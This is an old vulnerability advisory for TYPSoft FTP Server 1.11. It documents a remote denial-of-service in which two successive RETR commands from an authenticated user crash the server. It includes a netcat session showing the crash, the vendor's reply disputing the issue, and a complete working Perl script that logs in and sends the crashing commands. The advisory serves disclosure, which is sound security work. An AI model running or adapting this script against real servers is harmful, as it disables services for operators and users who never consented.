EXPL-A-2005-016 exploitlabs.com Advisory 045





AFFECTED PRODUCTS

TYPSoft FTP Server v1.11 and earlier
http://www.typsoft.com/



OVERVIEW

TYPSoft FTP Server is a fast and easy ftp server
 with support to Standard FTP Command,
 Clean interface, Virtual File System architecture,
 ability to resume Download and Upload, IP Restriction,
 Login/Quit message, logs, Multi Language
 and many other things.



DETAILS

1. DOS
Typsoft ftp server does not properly support the
 RETR command. When "Sub Directory Include" is checked
 in the user config. This is exploitable by authenticated
 users to TYPSoft ftpd.



POC
1. by requesting 2 RETR [string] commands in succession

C:\>nc -v 192.168.0.2 21
ftpserv [192.168.0.2] 21 (ftp) open
220 TYPSoft FTP Server 1.11 ready...
USER ok
331 Password required for ok.
PASS ok
230 User ok logged in.
RETR 0
150 Opening data connection for 0.
RETR 0
150 Opening data connection for 0.
[ crash here ]
C:\>

Exception ESocketException in module ftpserv.exe at 000862A6
"no port specified"

note: string length has no effect and
       does not appear exploitable.




SOLUTION:
vendor contact:
Oct 10, 2005 webmaster@typsoft.com

response:
---------
Well i dont see any security problem except that TFS will raise an error
because the socket was not open on the second RETR

It's more a bug that a security problem except if you show me the opposite.

Marc
TYPSoft


reply:
------
see attatched perl POC
http://www.exploitlabs.com/files/advisories/typsoft-poc.zip

it demonstrates a full crash ( program exit ) from remote.
note: a remote DOS[crash] is classified as a security issue, even if it does
not
lead to compromise, due to the fact that a remote user ( not
administrative )
can disable[crash] a (needed) service.


response:
---------
[none]




CREDITS

This vulnerability was discovered and researched by
Donnie Werner of exploitlabs


mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org

http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt

---

#!/usr/bin/perl

use IO::Socket;
use Socket;

print "\n-= TYPSoft FTP Server <= v1.11 DOS =-\n";
print "-= wood (at) Exploitlabs.com =-\n\n";

if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typsoft-1.11-DOS.pl <host> <user> <pass> [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };

$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err1 = "RETR 0";
$err2 = "RETR 1";


$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";

$remote->autoflush(1);

print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: cant send user\n";

print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: cant send pass\n";

print $remote "$err1/\n" and print "3. Sending : ErrorCode 1...\n";
print $remote "$err2/\n" and print "4. Sending : ErrorCode 2...\n\n"or die 
"Error: cant send error code\n";

print "Attack done. press any key to exit\n";
$bla= <STDIN>;
close $remote;